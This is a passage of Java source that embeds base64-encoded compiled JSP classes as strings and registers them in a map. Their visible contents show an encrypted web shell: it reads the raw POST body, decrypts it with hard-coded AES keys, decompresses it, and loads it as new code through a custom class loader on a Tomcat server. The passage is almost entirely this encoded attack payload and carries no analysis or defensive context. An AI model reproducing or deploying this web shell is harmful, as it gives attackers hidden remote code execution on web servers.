sL3ppcC9JbmZsYXRlcgoAlwAlCgCXAJsMAJwAcwEACHNldElucHV0BwCeAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0KAJ0AoAwAJgChAQAEKEkpVgoAlwCjDACkAKUBAAdpbmZsYXRlAQAFKFtCKUkKAJ0ApwwAqACpAQAFd3JpdGUBAAcoW0JJSSlWCgCXAKsMAKwArQEACGZpbmlzaGVkAQADKClaCgCXAK8MALAAGAEAA2VuZAoAnQCyDACzAHkBAAt0b0J5dGVBcnJheQcAtQEAE2phdmEvbGFuZy9UaHJvd2FibGUBAARkYXRhAQAHYmFzZUNscwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAHRGVjb2RlcgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAB3hvcl9rZXkBABJMamF2YS9sYW5nL1N0cmluZzsBAAFpAQABSQEAA2tleQEAA3JhdwEACHNrZXlTcGVjAQAhTGphdmF4L2NyeXB0by9zcGVjL1NlY3JldEtleVNwZWM7AQAGY2lwaGVyAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQAJZGVjcnlwdGVkAQAMZGVjb21wcmVzc2VyAQAYTGphdmEvdXRpbC96aXAvSW5mbGF0ZXI7AQAVYnl0ZUFycmF5T3V0cHV0U3RyZWFtAQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAA2J1ZgEAAW4BAA1TdGFja01hcFRhYmxlAQANZ2V0RGVwZW5kYW50cwEAESgpTGphdmEvdXRpbC9NYXA7AQA1KClMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL0xvbmc7PjsJAAEA0QwACwAMAQARZ2V0UGFja2FnZUltcG9ydHMBABEoKUxqYXZhL3V0aWwvU2V0OwEAJSgpTGphdmEvdXRpbC9TZXQ8TGphdmEvbGFuZy9TdHJpbmc7PjsBAA9nZXRDbGFzc0ltcG9ydHMBABlfanNwX2dldEV4cHJlc3Npb25GYWN0b3J5AQAeKClMamF2YXgvZWwvRXhwcmVzc2lvbkZhY3Rvcnk7CQABANkMABMAFAoAAQDbDADcAN0BABBnZXRTZXJ2bGV0Q29uZmlnAQAfKClMamF2YXgvc2VydmxldC9TZXJ2bGV0Q29uZmlnOwsA3wDhBwDgAQAbamF2YXgvc2VydmxldC9TZXJ2bGV0Q29uZmlnDADiAOMBABFnZXRTZXJ2bGV0Q29udGV4dAEAICgpTGphdmF4L3NlcnZsZXQvU2VydmxldENvbnRleHQ7CgAbAOUMAOYA5wEAGGdldEpzcEFwcGxpY2F0aW9uQ29udGV4dAEASShMamF2YXgvc2VydmxldC9TZXJ2bGV0Q29udGV4dDspTGphdmF4L3NlcnZsZXQvanNwL0pzcEFwcGxpY2F0aW9uQ29udGV4dDsLAOkA6wcA6gEAJ2phdmF4L3NlcnZsZXQvanNwL0pzcEFwcGxpY2F0aW9uQ29udGV4dAwA7ADXAQAUZ2V0RXhwcmVzc2lvbkZhY3RvcnkBABdfanNwX2dldEluc3RhbmNlTWFuYWdlcgEAJSgpTG9yZy9hcGFjaGUvdG9tY2F0L0luc3RhbmNlTWFuYWdlcjsJAAEA8AwAFQAWCgDyAPQHAPMBADBvcmcvYXBhY2hlL2phc3Blci9ydW50aW1lL0luc3RhbmNlTWFuYWdlckZhY3RvcnkMAPUA9gEAEmdldEluc3RhbmNlTWFuYWdlcgEAQihMamF2YXgvc2VydmxldC9TZXJ2bGV0Q29uZmlnOylMb3JnL2FwYWNoZS90b21jYXQvSW5zdGFuY2VNYW5hZ2VyOwEACF9qc3BJbml0AQALX2pzcERlc3Ryb3kBAAtfanNwU2VydmljZQEAUihMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7KVYHAPwBABNqYXZhL2lvL0lPRXhjZXB0aW9uBwD+AQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uCwEAAQIHAQEBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0DABVAQMBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwgBBQEAA0dFVAoAbwEHDAEIADABAAZlcXVhbHMIAQoBAARQT1NUCAEMAQAESEVBRAkBDgEQBwEPAQAcamF2YXgvc2VydmxldC9EaXNwYXRjaGVyVHlwZQwBEQESAQAFRVJST1IBAB5MamF2YXgvc2VydmxldC9EaXNwYXRjaGVyVHlwZTsLAQABFAwBFQEWAQARZ2V0RGlzcGF0Y2hlclR5cGUBACAoKUxqYXZheC9zZXJ2bGV0L0Rpc3BhdGNoZXJUeXBlOwoBDgEHCAEZAQA/SlNQcyBvbmx5IHBlcm1pdCBHRVQsIFBPU1Qgb3IgSEVBRC4gSmFzcGVyIGFsc28gcGVybWl0cyBPUFRJT05TCwEbAR0HARwBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQwBHgEfAQAJc2VuZEVycm9yAQAWKElMamF2YS9sYW5nL1N0cmluZzspVggBIQEACXRleHQvaHRtbAsBGwEjDAEkASUBAA5zZXRDb250ZW50VHlwZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAGwEnDAEoASkBAA5nZXRQYWdlQ29udGV4dAEAiihMamF2YXgvc2VydmxldC9TZXJ2bGV0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL1N0cmluZztaSVopTGphdmF4L3NlcnZsZXQvanNwL1BhZ2VDb250ZXh0OwoBKwDhBwEsAQAdamF2YXgvc2VydmxldC9qc3AvUGFnZUNvbnRleHQKASsA2woBKwEvDAEwATEBAApnZXRTZXNzaW9uAQAiKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uOwoBKwEzDAE0ATUBAAZnZXRPdXQBAB8oKUxqYXZheC9zZXJ2bGV0L2pzcC9Kc3BXcml0ZXI7CgE3ATkHATgBABtqYXZheC9zZXJ2bGV0L2pzcC9Kc3BXcml0ZXIMAKgAoQoAnQAlCwEAATwMAT0BPgEADmdldElucHV0U3RyZWFtAQAkKClMamF2YXgvc2VydmxldC9TZXJ2bGV0SW5wdXRTdHJlYW07CgFAAUIHAUEBACBqYXZheC9zZXJ2bGV0L1NlcnZsZXRJbnB1dFN0cmVhbQwBQwClAQAEcmVhZAoBRQFHBwFGAQAQamF2YS91dGlsL0FycmF5cwwBSAFJAQALY29weU9mUmFuZ2UBAAgoW0JJSSlbQgoAnQFLDACoAHMKATcBTQwBTgAYAQAFY2xlYXIKASsBUAwBUQFSAQAIcHVzaEJvZHkBACgoKUxqYXZheC9zZXJ2bGV0L2pzcC90YWdleHQvQm9keUNvbnRlbnQ7BwFUAQAeb3JnL2FwYWNoZS9qc3AvZ0FMYWhWQk9lX2pzcCRVCgBMAVYMAVcBWAEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwoBUwFaDAAmAVsBADgoTG9yZy9hcGFjaGUvanNwL2dBTGFoVkJPZV9qc3A7TGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgoAAQFdDABEAEUKAVMBXwwBYAFhAQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwoAXgEHBwFkAQAjamF2YXgvc2VydmxldC9qc3AvU2tpcFBhZ2VFeGNlcHRpb24KATcBZgwBZwFoAQANZ2V0QnVmZmVyU2l6ZQEAAygpSQsBGwFqDAFrAK0BAAtpc0NvbW1pdHRlZAoBNwFtDAFuABgBAAVmbHVzaAoBNwFwDAFxABgBAAtjbGVhckJ1ZmZlcgoBKwFzDAF0AXUBABNoYW5kbGVQYWdlRXhjZXB0aW9uAQAYKExqYXZhL2xhbmcvVGhyb3dhYmxlOylWCgD9AXcMACYBdQoAGwF5DAF6AXsBABJyZWxlYXNlUGFnZUNvbnRleHQBACIoTGphdmF4L3NlcnZsZXQvanNwL1BhZ2VDb250ZXh0OylWAQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEADF9qc3B4X21ldGhvZAEAC3BhZ2VDb250ZXh0AQAfTGphdmF4L3NlcnZsZXQvanNwL1BhZ2VDb250ZXh0OwEAA291dAEAHUxqYXZheC9zZXJ2bGV0L2pzcC9Kc3BXcml0ZXI7AQAJX2pzcHhfb3V0AQASX2pzcHhfcGFnZV9jb250ZXh0AQADYm9zAQAGbGVuZ3RoAQABdAEAFUxqYXZhL2xhbmcvVGhyb3dhYmxlOwEAClNvdXJjZUZpbGUBABJnQUxhaFZCT2VfanNwLmphdmEBAAxJbm5lckNsYXNzZXMBAAFVADEAAQADAAIABQA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";map.put("gALahVBOe_jsp", gALahVBOe_jsp);String gtf6NyAEe_jsp$U = "yv66vgAAADQAIwcAAgEAHm9yZy9hcGFjaGUvanNwL2d0ZjZOeUFFZV9qc3AkVQcABAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEABnRoaXMkMAEAHkxvcmcvYXBhY2hlL2pzcC9ndGY2TnlBRWVfanNwOwEABjxpbml0PgEAOChMb3JnL2FwYWNoZS9qc3AvZ3RmNk55QUVlX2pzcDtMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQAEQ29kZQkAAQALDAAFAAYKAAMADQwABwAOAQAaKExqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAgTG9yZy9hcGFjaGUvanNwL2d0ZjZOeUFFZV9qc3AkVTsBAAFjAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAFnAQAVKFtCKUxqYXZhL2xhbmcvQ2xhc3M7CgADABgMABkAGgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsBAAFiAQACW0IBAApTb3VyY2VGaWxlAQASZ3RmNk55QUVlX2pzcC5qYXZhAQAMSW5uZXJDbGFzc2VzBwAhAQAcb3JnL2FwYWNoZS9qc3AvZ3RmNk55QUVlX2pzcAEAAVUAIAABAAMAAAABEBAABQAGAAAAAgAAAAcACAABAAkAAAA/AAIAAwAAAAsqK7UACiostwAMsQAAAAIADwAAAAYAAQAAADwAEAAAABYAAgAAAAsAEQASAAAAAAALABMAFAACAAEAFQAWAAEACQAAAEEABAACAAAACSorAyu+twAXsAAAAAIADwAAAAoAAgAAAD0ACAA8ABAAAAAWAAIAAAAJABEAEgAAAAAACQAbABwAAQACAB0AAAACAB4AHwAAAAoAAQABACAAIgAA";map.put("gtf6NyAEe_jsp$U", gtf6NyAEe_jsp$U);String gtf6NyAEe_jsp = "yv66vgAAADQBmQcAAgEAHG9yZy9hcGFjaGUvanNwL2d0ZjZOeUFFZV9qc3AHAAQBACVvcmcvYXBhY2hlL2phc3Blci9ydW50aW1lL0h0dHBKc3BCYXNlBwAGAQAsb3JnL2FwYWNoZS9qYXNwZXIvcnVudGltZS9Kc3BTb3VyY2VEZXBlbmRlbnQHAAgBACpvcmcvYXBhY2hlL2phc3Blci9ydW50aW1lL0pzcFNvdXJjZUltcG9ydHMBAAxfanNweEZhY3RvcnkBACBMamFrYXJ0YS9zZXJ2bGV0L2pzcC9Kc3BGYWN0b3J5OwEAEF9qc3B4X2RlcGVuZGFudHMBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADNMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL0xvbmc7PjsBABZfanNweF9pbXBvcnRzX3BhY2thZ2VzAQAPTGphdmEvdXRpbC9TZXQ7AQAjTGphdmEvdXRpbC9TZXQ8TGphdmEvbGFuZy9TdHJpbmc7PjsBABVfanNweF9pbXBvcnRzX2NsYXNzZXMBABVfZWxfZXhwcmVzc2lvbmZhY3RvcnkBAB5MamFrYXJ0YS9lbC9FeHByZXNzaW9uRmFjdG9yeTsBABRfanNwX2luc3RhbmNlbWFuYWdlcgEAI0xvcmcvYXBhY2hlL3RvbWNhdC9JbnN0YW5jZU1hbmFnZXI7AQAIPGNsaW5pdD4BAAMoKVYBAARDb2RlCgAbAB0HABwBAB5qYWthcnRhL3NlcnZsZXQvanNwL0pzcEZhY3RvcnkMAB4AHwEAEWdldERlZmF1bHRGYWN0b3J5AQAiKClMamFrYXJ0YS9zZXJ2bGV0L2pzcC9Kc3BGYWN0b3J5OwkAAQAhDAAJAAoHACMBABFqYXZhL3V0aWwvSGFzaFNldAoAIgAlDAAmABgBAAY8aW5pdD4JAAEAKAwADwAQCAAqAQAMamF2YXguY3J5cHRvCwAsAC4HAC0BAA1qYXZhL3V0aWwvU2V0DAAvADABAANhZGQBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoIADIBAAlqYXZhLnV0aWwIADQBAA9qYWthcnRhLnNlcnZsZXQIADYBAAdqYXZhLmlvCAA4AQAUamFrYXJ0YS5zZXJ2bGV0Lmh0dHAIADoBABNqYWthcnRhLnNlcnZsZXQuanNwCAA8AQARamF2YXguY3J5cHRvLnNwZWMJAAEAPgwAEgAQAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlCgADACUBAAR0aGlzAQAeTG9yZy9hcGFjaGUvanNwL2d0ZjZOeUFFZV9qc3A7AQAHRGVjcnlwdAEABihbQilbQgEACkV4Y2VwdGlvbnMHAEgBABNqYXZhL2xhbmcvRXhjZXB0aW9uCABKAQAQamF2YS51dGlsLkJhc2U2NAoATABOBwBNAQAPamF2YS9sYW5nL0NsYXNzDABPAFABAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwgAUgEACmdldERlY29kZXIKAEwAVAwAVQBWAQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwoAWABaBwBZAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kDABbAFwBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsKAF4AYAcAXwEAEGphdmEvbGFuZy9PYmplY3QMAGEAYgEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwgAZAEABmRlY29kZQcAZgEAAltCCABoAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgoATABqDABrAGwBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7CABuAQAMZGVjb2RlQnVmZmVyBwBwAQAQamF2YS9sYW5nL1N0cmluZwoAbwByDAAmAHMBAAUoW0IpVggAdQEAEDgyY2E5YjQzYzFiOGVmOGMKAG8AdwwAeAB5AQAIZ2V0Qnl0ZXMBAAQoKVtCCAB7AQAQYjQyZTMyN2ZlYjVkOTIzYggAfQEABXV0Zi04CgBvAH8MAHgAgAEAFihMamF2YS9sYW5nL1N0cmluZzspW0IHAIIBAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjCACEAQADQUVTCgCBAIYMACYAhwEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWCACJAQAUQUVTL0VDQi9QS0NTNVBhZGRpbmcKAIsAjQcAjAEAE2phdmF4L2NyeXB0by9DaXBoZXIMAI4AjwEAC2dldEluc3RhbmNlAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsKAIsAkQwAkgCTAQAEaW5pdAEAFyhJTGphdmEvc2VjdXJpdHkvS2V5OylWCgCLAJUMAJYARQEAB2RvRmluYWwHAJgBABZqYXZhL3V0aWwvemlwL0luZmxhdGVyCgCXACUKAJcAmwwAnABzAQAIc2V0SW5wdXQHAJ4BAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQoAnQCgDAAmAKEBAAQoSSlWCgCXAKMMAKQApQEAB2luZmxhdGUBAAUoW0IpSQoAnQCnDACoAKkBAAV3cml0ZQEAByhbQklJKVYKAJcAqwwArACtAQAIZmluaXNoZWQBAAMoKVoKAJcArwwAsAAYAQADZW5kCgCdALIMALMAeQEAC3RvQnl0ZUFycmF5BwC1AQATamF2YS9sYW5nL1Rocm93YWJsZQEABGRhdGEBAAdiYXNlQ2xzAQARTGphdmEvbGFuZy9DbGFzczsBAAdEZWNvZGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHeG9yX2tleQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAWkBAAFJAQADa2V5AQADcmF3AQAIc2tleVNwZWMBACFMamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYzsBAAZjaXBoZXIBABVMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAlkZWNyeXB0ZWQBAAxkZWNvbXByZXNzZXIBABhMamF2YS91dGlsL3ppcC9JbmZsYXRlcjsBABVieXRlQXJyYXlPdXRwdXRTdHJlYW0BAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQADYnVmAQABbgEADVN0YWNrTWFwVGFibGUBAA1nZXREZXBlbmRhbnRzAQARKClMamF2YS91dGlsL01hcDsBADUoKUxqYXZhL3V0aWwvTWFwPExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvTG9uZzs+OwkAAQDRDAALAAwBABFnZXRQYWNrYWdlSW1wb3J0cwEAESgpTGphdmEvdXRpbC9TZXQ7AQAlKClMamF2YS91dGlsL1NldDxMamF2YS9sYW5nL1N0cmluZzs+OwEAD2dldENsYXNzSW1wb3J0cwEAGV9qc3BfZ2V0RXhwcmVzc2lvbkZhY3RvcnkBACAoKUxqYWthcnRhL2VsL0V4cHJlc3Npb25GYWN0b3J5OwkAAQDZDAATABQKAAEA2wwA3ADdAQAQZ2V0U2VydmxldENvbmZpZwEAISgpTGpha2FydGEvc2VydmxldC9TZXJ2bGV0Q29uZmlnOwsA3wDhBwDgAQAdamFrYXJ0YS9zZXJ2bGV0L1NlcnZsZXRDb25maWcMAOIA4wEAEWdldFNlcnZsZXRDb250ZXh0AQAiKClMamFrYXJ0YS9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwoAGwDlDADmAOcBABhnZXRKc3BBcHBsaWNhdGlvbkNvbnRleHQBAE0oTGpha2FydGEvc2VydmxldC9TZXJ2bGV0Q29udGV4dDspTGpha2FydGEvc2VydmxldC9qc3AvSnNwQXBwbGljYXRpb25Db250ZXh0OwsA6QDrBwDqAQApamFrYXJ0YS9zZXJ2bGV0L2pzcC9Kc3BBcHBsaWNhdGlvbkNvbnRleHQMAOwA1wEAFGdldEV4cHJlc3Npb25GYWN0b3J5AQAXX2pzcF9nZXRJbnN0YW5jZU1hbmFnZXIBACUoKUxvcmcvYXBhY2hlL3RvbWNhdC9JbnN0YW5jZU1hbmFnZXI7CQABAPAMABUAFgoA8gD0BwDzAQAwb3JnL2FwYWNoZS9qYXNwZXIvcnVudGltZS9JbnN0YW5jZU1hbmFnZXJGYWN0b3J5DAD1APYBABJnZXRJbnN0YW5jZU1hbmFnZXIBAEQoTGpha2FydGEvc2VydmxldC9TZXJ2bGV0Q29uZmlnOylMb3JnL2FwYWNoZS90b21jYXQvSW5zdGFuY2VNYW5hZ2VyOwEACF9qc3BJbml0AQALX2pzcERlc3Ryb3kBAAtfanNwU2VydmljZQEAVihMamFrYXJ0YS9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYWthcnRhL3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOylWBwD8AQATamF2YS9pby9JT0V4Y2VwdGlvbgcA/gEAIGpha2FydGEvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uCQEAAQIHAQEBAB5qYWthcnRhL3NlcnZsZXQvRGlzcGF0Y2hlclR5cGUMAQMBBAEABUVSUk9SAQAgTGpha2FydGEvc2VydmxldC9EaXNwYXRjaGVyVHlwZTsLAQYBCAcBBwEAJ2pha2FydGEvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAwBCQEKAQARZ2V0RGlzcGF0Y2hlclR5cGUBACIoKUxqYWthcnRhL3NlcnZsZXQvRGlzcGF0Y2hlclR5cGU7CgEAAQwMAQ0AMAEABmVxdWFscwsBBgEPDABVARABABQoKUxqYXZhL2xhbmcvU3RyaW5nOwgBEgEAB09QVElPTlMKAG8BDAgBFQEABUFsbG93CAEXAQAYR0VULCBIRUFELCBQT1NULCBPUFRJT05TCwEZARsHARoBAChqYWthcnRhL3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAEcAR0BAAlzZXRIZWFkZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KVYIAR8BAANHRVQIASEBAARQT1NUCAEjAQAESEVBRAgBJQEAP0pTUHMgb25seSBwZXJtaXQgR0VULCBQT1NUIG9yIEhFQUQuIEphc3BlciBhbHNvIHBlcm1pdHMgT1BUSU9OUwsBGQEnDAEoASkBAAlzZW5kRXJyb3IBABYoSUxqYXZhL2xhbmcvU3RyaW5nOylWCAErAQAJdGV4dC9odG1sCwEZAS0MAS4BLwEADnNldENvbnRlbnRUeXBlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWCgAbATEMATIBMwEADmdldFBhZ2VDb250ZXh0AQCSKExqYWthcnRhL3NlcnZsZXQvU2VydmxldDtMamFrYXJ0YS9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYWthcnRhL3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvU3RyaW5nO1pJWilMamFrYXJ0YS9zZXJ2bGV0L2pzcC9QYWdlQ29udGV4dDsKATUA4QcBNgEAH2pha2FydGEvc2VydmxldC9qc3AvUGFnZUNvbnRleHQKATUA2woBNQE5DAE6ATsBAApnZXRTZXNzaW9uAQAkKClMamFrYXJ0YS9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247CgE1AT0MAT4BPwEABmdldE91dAEAISgpTGpha2FydGEvc2VydmxldC9qc3AvSnNwV3JpdGVyOwoBQQFDBwFCAQAdamFrYXJ0YS9zZXJ2bGV0L2pzcC9Kc3BXcml0ZXIMAKgAoQoAnQAlCwEGAUYMAUcBSAEADmdldElucHV0U3RyZWFtAQAmKClMamFrYXJ0YS9zZXJ2bGV0L1NlcnZsZXRJbnB1dFN0cmVhbTsKAUoBTAcBSwEAImpha2FydGEvc2VydmxldC9TZXJ2bGV0SW5wdXRTdHJlYW0MAU0ApQEABHJlYWQKAU8BUQcBUAEAEGphdmEvdXRpbC9BcnJheXMMAVIBUwEAC2NvcHlPZlJhbmdlAQAIKFtCSUkpW0IKAJ0BVQwAqABzCgFBAVcMAVgAGAEABWNsZWFyCgE1AVoMAVsBXAEACHB1c2